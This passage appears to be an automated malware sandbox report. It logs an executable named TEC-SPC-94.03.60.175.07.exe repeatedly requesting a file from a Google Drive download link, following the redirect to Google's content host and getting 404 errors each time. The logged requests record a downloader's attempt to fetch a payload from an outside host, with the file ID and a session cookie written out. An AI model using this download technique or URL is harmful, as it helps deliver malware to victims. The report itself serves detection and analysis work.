                                                        2024-12-16 16:58:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 69 76 69 73 37 32 62 36 36 66 6e 59 35 4e 43 46 57 5f 68 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nivis72b66fnY5NCFW_hoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.649893172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:20 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:21 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:20 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-z0R4eIR1cZGaollvr0t2pQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.649901142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:23 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:24 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC7ENJUW9YDNtqr91CXExvPDiKec78JJ-aSJG3E6-CbMaWA6RXmxY9pvwZNBmVRpXON5
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:23 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-6m_NedVDerj5VWVdAx2a7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 7a 33 44 46 44 36 35 6a 77 33 4e 71 66 64 65 59 4a 6e 6b 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="az3DFD65jw3NqfdeYJnkXA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.649909172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:25 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:26 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:26 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-rb44_5NNu2InLcRyuCFZPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.649915142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:28 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:29 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4Rn3ZSk2YusbqWeC-xe0HlNwUBSdJEsh5dulQ-8fhZ6y-S5IYzKnUCtespAhAbDKwN
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:29 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-cKUTA4beyHyle-T6IgySpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 66 31 69 58 4a 54 68 59 32 66 50 51 72 55 56 49 4d 2d 64 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Nf1iXJThY2fPQrUVIM-dJg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.649920172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:31 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:32 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:31 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-tp7mQCslTYlqAhDEE1Dmpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.649927142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:34 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:35 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC55gEjPcwPIkiKeViFnktnNt2m9EBXdbAqyNvvmGFR9BdBnSisRSNH7j1tle65LpoiU
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:34 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-vz4pdYJI02uB_MBo4kA2GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 4d 5f 54 36 39 46 31 42 4c 66 66 4f 69 4a 35 54 6f 39 33 7a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NM_T69F1BLffOiJ5To93zg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.649937172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:36 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:37 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:37 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-xdjMwMZltQ-38F2WNqF8zA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.649943142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:39 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:40 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6-UKSDFlAHi5iY25XwYzkRsM13FxcWxPINHyuX3J8JMWPVJuYJTyF49xGyHjdEEbS-
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:40 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
